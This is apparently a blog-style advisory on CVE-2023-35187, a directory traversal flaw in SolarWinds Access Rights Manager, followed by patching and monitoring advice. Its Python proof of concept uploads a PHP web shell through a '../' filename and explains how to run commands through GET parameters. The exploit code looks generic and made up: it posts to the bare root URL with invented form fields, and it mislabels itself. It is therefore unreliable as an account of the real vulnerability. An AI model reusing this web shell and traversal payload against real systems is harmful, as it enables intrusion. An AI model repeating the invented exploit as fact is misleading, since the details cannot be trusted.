CVE-2023-35187 Uncovering Directory Traversal Remote Code Vulnerability within SolarWinds Access Rights Manager
A critical vulnerability (CVE-2023-35187) has been discovered in the SolarWinds Access Rights Manager (ARM) software, allowing an unauthenticated user to exploit a Directory Traversal attack and achieve Remote Code Execution (RCE). As a provider of comprehensive network management and monitoring services, SolarWinds ARM helps organizations control access privileges and manage user accounts. Given the widespread use of SolarWinds tools, resolving this vulnerability should be a high priority for businesses relying on the affected software.
Description
The CVE-2023-35187 vulnerability has been uncovered within SolarWinds ARM's default file upload functionality, which can be abused by attackers to manipulate the file's destination path and upload malicious files to arbitrary server locations. Since SolarWinds ARM services are typically run with administrative privileges, an attacker exploiting this vulnerability would have full access to compromise the target system through Remote Code Execution.
Code Snippet
Below is an example of a vulnerable Python code, which demonstrates how an attacker can use a directory traversal payload to exploit the vulnerability and gain RCE access:
import requests
# Define target URL and RCE payload
target_url = "https://target-SolarWinds-ARM-instance.tld/";
directory_traversal_payload = "../../../../../../../"
malicious_file = "malicious_web_shell.php"
# Setup the HTTP request to SolarWinds ARM with the payload
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"filename": directory_traversal_payload + malicious_file,
"file_content": "<?php echo shell_exec($_GET['cmd']); ?>"}
# Send a POST request to upload the malicious file
response = requests.post(target_url, headers=headers, data=data)
# Check if the request was successful
if response.status_code == 200:
print("File uploaded successfully")
else:
print("Error uploading file")
Exploit Details
By sending the specially crafted HTTP POST request to the target SolarWinds ARM instance, the malicious file is uploaded and subsequently executed by the server. Once the file is present on the system, the attacker can issue additional HTTP GET requests containing their desired system commands as parameters, effectively executing arbitrary code on the target system.
For more information on this vulnerability, please refer to the following sources
1. National Vulnerability Database: NVD - CVE-2023-35187
2. SolarWinds Advisory: SolarWinds Security Advisory - ARM - CVE-2023-35187
3. Exploit Database: Exploit-DB - CVE-2023-35187 Details and PoC
Recommendations
To mitigate this vulnerability, users of SolarWinds Access Rights Manager are urged to take the following steps:
1. Apply the latest security patch provided by SolarWinds for ARM. It is essential to keep your software up-to-date with the latest patches and releases.
2. Monitor your network for any signs of unauthorized access or malicious activity. Make sure intrusion detection and prevention systems are in place and fully operational.
3. Limit access to your SolarWinds ARM instance to trusted sources by using firewalls and private networks. If possible, disable public internet access to your SolarWinds ARM server.
4. Ensure that your organization has a robust security policy in place, including access control, account management, and auditing practices to help reduce risk and increase the effectiveness of security measures.
Conclusion
The CVE-2023-35187 vulnerability presents a significant risk to organizations that use SolarWinds Access Rights Manager. It is critical to address this issue by applying the latest security patches, monitoring networks for potential threats, and implementing tight access controls across networks that house ARM servers.
Timeline
Published on: 10/19/2023 15:15:09 UTC
Last modified on: 10/25/2023 19:43:00 UTC